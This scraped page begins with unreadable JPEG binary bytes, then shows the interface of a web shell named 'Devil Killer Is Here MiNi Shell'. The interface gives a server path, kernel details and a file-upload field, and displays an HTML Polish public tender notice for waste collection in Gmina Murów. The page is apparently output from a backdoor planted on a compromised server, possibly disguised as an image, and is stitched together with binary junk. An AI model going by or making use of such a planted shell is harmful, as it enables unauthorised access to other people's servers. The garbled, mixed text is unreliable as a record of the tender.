JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150722/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150722/185950-N-2015.html

<p class="kh_header"><b>Murów: Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych, niezamieszkałych i mieszanych z terenu Gminy Murów.</b><br>
<b>Numer ogłoszenia: 185950 - 2015; data zamieszczenia: 22.07.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Murów , ul. Dworcowa 2, 46-030 Murów, woj. opolskie, tel. 0-77 4214034, faks 0-77 4214032.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.murow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych, niezamieszkałych i mieszanych z terenu Gminy Murów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
1) odbiór i zagospodarowanie  (odzysk lub unieszkodliwienie) odpadów komunalnych powstałych na wszystkich nieruchomościach  zamieszkałych , niezamieszkałych i mieszanych  na których powstają odpady komunalne, na terenie Gminy Murów,
2) zbiórkę odpadów komunalnych niesegregowanych  (zmieszanych),
3) zbiórkę odpadów gromadzonych selektywnie typu: makulatura, tworzywa sztuczne 
w tym opakowania PET i puszki po napojach, szkło oraz opakowania ze szkła za wyjątkiem stłuczki szklanej, zbieranych w  workach  i pojemnikach 
4) zbiórkę odpadów budowlanych i rozbiórkowych,
5) zbiórkę odpadów niebezpiecznych powstających w gospodarstwach domowych typu: zużyte baterie i akumulatory, chemikalia, przeterminowane leki, z wyłączeniem zużytego sprzętu elektronicznego zawierającego substancje niebezpieczne,
6) zbiórka mebli i innych odpadów wielkogabarytowych, zużyty sprzęt elektryczny 
i elektroniczny oraz zużytych opon,
7) zbiórka odpadów ulegających biodegradacji powstające w gospodarstwach domowych
8) wyposażenie nieruchomości nieodpłatnie w worki plastikowe (nie będące pojemnikami w rozumieniu ustawy o utrzymaniu czystości i porządku w gminach) na odpady segregowane,
9) wywóz odpadów komunalnych realizowany będzie na rzecz Gminy Murów-
w zakresie zawartych przez Gminę umów na świadczenie usług wywozu odpadów komunalnych. Niesegregowane odpady komunalne oraz segregowane odpady komunalne powinny być poddane odzyskowi lub unieszkodliwianiu na obszarze województwa opolskiego, w instalacjach spełniających wymagania najlepszej dostępnej techniki lub technologii, o której mowa w art. 143 ustawy z dnia 27 kwietnia 2001r. Prawo ochrony środowiska ( Dz. U. Nr 99, poz. 56 z późn. zm.),
10) opracowanie i dostarczenie właścicielom nieruchomości harmonogramu odbioru poszczególnych rodzajów odpadów,
11) prowadzenie i przekazywanie do Zamawiającego dokumentacji objętej zamówieniem,
12) odbiór i zagospodarowanie odpadów winno się odbywać zgodnie z wytycznymi Planu Gospodarki Odpadami dla Województwa Opolskiego na lata 2012-2017, przepisami prawa polskiego oraz przepisami prawa miejscowego.
2.Dane ilościowe pozwalające ustalić cenę oferty: stan na dzień 18 czerwiec 2015r
1) liczba mieszkańców, którzy są objęci usługą odbierania odpadów komunalnych stałych w Gminie Murów - około 4067 osób zamieszkałych wg złożonych deklaracji
2) liczba  nieruchomości (punktów adresowych) - 1469, w tym zamieszkałych: 1352, niezamieszkałych na których powstają odpady komunalne  117,
3) liczba worków na selektywnie zbierane odpady komunalne:
tworzywo sztuczne - 22 000
makulatura - 10 000 
szkło - 13 000 
4) przewidywana ilość odpadów komunalnych powstających na nieruchomościach 
    zamieszkałych i niezamieszkałych z terenu gminy Murów :
liczba odebranych odpadów komunalnych z terenu gminy Murów przez firmy w latach 2012-2014
Rodzaj odpadów w Mg
odpady zmieszane 2012r. 748,5, 2013r- 823,8, 2014r- 918,1
odpady wielkogabarytowe: 2012r- 47,6 ; 2013r- 47,5; 2014r- 38,3
Papier i tektura: 2012r-25,7; 2013r- 32,1; 2014r-20,1
szkło:  2012r.- 38,3;2013r-60,3; 2014r- 72,4
odpady z budowy- 2012r-28,1; 2013r-10,6; 2014-27,1
tworzywa sztuczne- 2012r- 37,9; 2013r- 51,5; 2014- 39,0
odpady biodegradowalne bez makulatury: 2012r- 0,0; 2013r-1,9; 2014r-5,5
złom: 2012r-0,0; 2013r-1,9; 2014r-26,9
Urządzenia elektryczne i elektroniczne: 2012r i 2013r -0 ( uwzględnione w odpadach wielkogabarytowych; 2014r- 2,6
leki- w 2012r- 0; 2013r- 0,004; 2014r- 0,03
Łącznie zebrano odpadów w Mg: w 2012r - 926,1; 2013r-1029,6; 2014r- 1177,1
Ilość odpadów podana powyżej jest orientacyjna  i wynika ze sprawozdań przedkładanych Wójtowi Gminy Murów.
Szczegółowy opis przedmiotu zamówienia określa załącznik Nr 1 do SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje udzielanie zamówień uzupełniających o których mowa w art. 67 ust. 1 pkt. 6 ustawy Prawo zamówień publicznych do 10% wartości zamówienia podstawowego.Przedmiotem zamówień uzupełniających jest powtórzenie tego samego rodzaju prac co w zamówieniu podstawowym</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.51.30.00-7, 90.51.40.00-3, 90.51.20.00-9, 90.51.00.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający wymaga wniesienia wadium. Ustala się wadium w wysokości: 6.600,00PLN słownie: sześć tysięcy sześćset złotych/100 
 2. Wadium należy wnieść przed terminem składania ofert, określonego  w Rozdziale   12 niniejszej SIWZ, przy czym za termin wniesienia  wadium w formie pieniężnej za 
pomocą przelewu bankowego Zamawiający będzie  uważał za  skuteczne tylko wówczas, gdy bank prowadzący rachunek  Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu  składania ofert.
 3.   Wadium może być wnoszone w jednej lub kilku następujących formach:
       1)   w pieniądzu,
       2)   w poręczeniach bankowych lub poręczeniach spółdzielczej kasy 
             oszczędnościowo-  kredytowej, z tym że poręczenie kasy jest zawsze 
              poręczeniem pieniężnym,
       3)    w gwarancjach bankowych
       4)   w gwarancjach ubezpieczeniowych,
       5)  w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust.   5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji 
 Rozwoju  Przedsiębiorczości ( Dz. U. Nr 109, poz. 1158, z późn. zm).

Wadium wnoszone w pieniądzu wpłaca się PRZELEWEM na rachunek bankowy   
Zamawiającego Bank  Spółdzielczy Łubniany  Nr  21 8897 0004 2001 0006 0163 0003  z  dopiskiem Wadium - Odbiór i zagospodarowanie odpadów komunalnych z nieruchomości zamieszkałych i niezamieszkałych z terenu Gminy Murów.
Do oferty należy dołączyć kopię polecenia przelewu lub kserokopię potwierdzoną za     zgodność z oryginałem- przez osoby odpowiednio upoważnione do reprezentowania.
Wadium wnoszone w formie poręczeń lub gwarancji winno być złożone w oryginale.
Oryginał dokumentu wraz z jego kopią ( potwierdzoną za zgodność z oryginałem) należy dołączyć do oferty w oddzielnej kopercie.          

4. Wadium składane w formie gwarancji i lub poręczenia, gwarancja i lub poręczenie   
   powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać, między innymi następujące elementy: 
       1)   nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji i/lub poręczenia  (Zamawiającego),gwaranta i lub poręczyciela (banku lub instytucji ubezpieczeniowej  udzielających gwarancji i lub poręczenia) oraz wskazanie ich siedzib.
      2)   dokładne przytoczenie nazwy i przedmiotu niniejszego postępowania
      3)  precyzyjne określenie wierzytelności, która ma być zabezpieczona   
           gwarancją   i lub  poręczeniem,
      4)    kwotę gwarancji i lub poręczenia,
      5)    termin ważności gwarancji i lub poręczenia 
      6) zobowiązanie gwaranta i lub poręczyciela do: nieodwołalnego i bezwarunkowego zapłacenia kwoty gwarancji i lub poręczenia na pierwsze pisemne żądanie Zamawiającego zawierającego oświadczenie, iż:
 - Wykonawca w odpowiedzi na wezwanie do uzupełnienia oświadczeń, dokumentów  lub pełnomocnictw o którym mowa w art. 26 ust. 3 Ustawy Pzp., nie złożył wymaganych   dokumentów lub oświadczeń, o których  mowa w art. 25 ust. 1 Ustawy Pzp. lub pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji  o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki , o której mowa w art. 87 ust. 2 pkt 3, co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej chyba, że Wykonawca udowodni, że wynika to z przyczyn nieleżących  po jego stronie, lub
-  Wykonawca, którego ofertę wybrano odmówił podpisania umowy na warunkach 
    określonych w ofercie , lub
-  Wykonawca, którego ofertę wybrano nie wniósł zabezpieczenia należytego 
    wykonania umowy, lub
 - zawarcie umowy, z Wykonawcą, którego ofertę wybrano, stało się niemożliwe z 
    przyczyn leżących po stronie Wykonawcy;
    7)  okres ważności gwarancji i  lub poręczenia nie może być  krótszy niż okres   
        związania  ofert z ofertą tj. 30dni.
5. Zamawiający zwróci niezwłocznie wadium wszystkim wykonawcom po wyborze 
   najkorzystniejszej oferty lub unieważnieniu postępowania, z wyjątkiem Wykonawcy, 
   którego oferta zostanie wybrana jako najkorzystniejsza. 
6. Wykonawcy , którego oferta zostanie wybrana jako najkorzystniejsza Zamawiający  zwróci wadium niezwłocznie po zawarciu umowy .
7.  Zamawiający zwróci niezwłocznie wadium  wraz z odsetkami na wniosek Wykonawcy,  który wycofał ofertę przed terminem składania ofert.
8.  W sprawie wadium obowiązują uregulowania ustawy- Prawo zamówień publicznych zawarte w art. 45 i 46.
9.  Nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje  wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy Pzp.
10. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia wadium  (w każdej z dopuszczalnych form) może być wniesione przez jednego, kilku lub  wszystkich Wykonawców, pod warunkiem, iż łączna wysokość wniesionego wadium  odpowiadać będzie wymaganej kwocie. W takim przypadku składając wadium należy  wskazać w imieniu kogo i tytułem jakiego postępowania jest wnoszone.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia ubiegać się mogą wszyscy Wykonawcy, którzy:
   Spełniają warunki określone w art. 22  ust. 1 ustawy PzP, dotyczące:
1) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli 
 przepisy prawa nakładają obowiązek ich posiadania tj;posiadają wpis do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości prowadzonego przez Wójta Gminy Murów,
 -  posiadają zezwolenie   na prowadzenie działalności w zakresie zbierania i transportu odpadów wydane na podstawie przepisów ustawy z dnia 14 grudnia 2012r. o  odpadach  ( Dz. U. Z 2013r. poz.21.
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w 
postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia  i dokumenty wg. metody spełnia - nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia, tj. wykonali, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług  w okresie ostatnich trzech  lat przed upływem  terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej:  jedną usługę  polegającą na odbieraniu i zagospodarowaniu odpadów komunalnych ( zmieszanych i segregowanych)  od właścicieli nieruchomości o czasie świadczenia nie krótszym niż 12 miesięcy o wartości nie mniejszej niż   400.000,00zł brutto.
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w 
postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia  i dokumenty wg. metody spełnia - nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponowania odpowiednim potencjałem technicznym tj.: dysponuje lub będzie dysponować samochodami do   odbioru  odpadów spełniającymi  wymagania techniczne określone przepisami ustawy prawo o  ruchu drogowym oraz innymi przepisami szczególnymi (w tym rozporządzeniem Ministra Środowiska z dnia 11 stycznia  2013 r. w sprawie szczegółowych wymagań w  zakresie odbierania odpadów komunalnych   od   właścicieli   nieruchomości (Dz. U. z 2013,    poz. 122 z późn. zm), w celu realizacji zamówienia, w tym:
1. minimum dwoma pojazdami do odbierania zmieszanych odpadów komunalnych 
z pojemników,
2. minimum dwoma pojazdami do odbierania odpadów selektywnie zbieranych,
3. minimum jednym pojazdem do odbierania odpadów ulegających biodegradacji,
4. minimum jednym pojazdem z dźwigiem do odbioru kontenerów
z odpadami
5. minimum jednym pojazdem do odbierania odpadów wielkogabarytowych.
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w 
postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia  i dokumenty wg. metody spełnia - nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełniania tego warunku. Zamawiający uzna warunek za spełniony na podstawie stosownego oświadczenia złożonego zgodnie ze  wzorem określonym w załączniku nr 3 do SIWZ.
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w 
postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia  i dokumenty wg. metody spełnia - nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu sposobu oceny spełniania tego warunku. Zamawiający uzna warunek za spełniony na podstawie stosownego oświadczenia złożonego zgodnie ze  wzorem określonym w załączniku nr 3 do SIWZ.
Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w 
postępowaniu na dzień składania ofert w oparciu o złożone wraz z ofertą oświadczenia  i dokumenty wg. metody spełnia - nie spełnia co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Upoważnienie- pełnomocnictwo do postępowania w imieniu Wykonawcy- Uwaga: dołączone wtedy o ile nie wynika z załączonych dokumentów.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Termin płatności faktury - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiana istotnych postanowień niniejszej Umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, jest dopuszczalna w szczególnie uzasadnionych przypadkach.
2. Zmiana może obejmować:
    1) zmiany przez ustawodawcę  wysokości należnych podatków i opłat w szczególności zmiany stawki  podatku VAT,
    2) inną okoliczność prawną, ekonomiczną lub techniczną skutkującą
       niemożliwością wykonania lub nienależytym wykonaniem Umowy zgodnie z SIWZ.
     3) wystąpienia wyjątkowych okoliczności , niezależnych od Stron umowy  
         których   nie mogły one przewidzieć w chwili zawierania umowy, a 
         wpływających na realizację 
    4)  zmiany podwykonawców, których udział w realizacji przedmiotu umowy
         zaakceptował Zamawiający,
3. Warunkiem dokonania zmian, o których mowa w ust. 2 jest złożenie pisemnego wniosku przez stronę inicjującą zmianę, zawierającego:
      1)   opis propozycji zmiany,
      2)   uzasadnienie zmiany
      3)   obliczenie kosztów zmiany zgodnie z zasadami określonymi w umowie, jeżeli zmiana   będzie miała wpływ na wynagrodzenie wykonawcy,
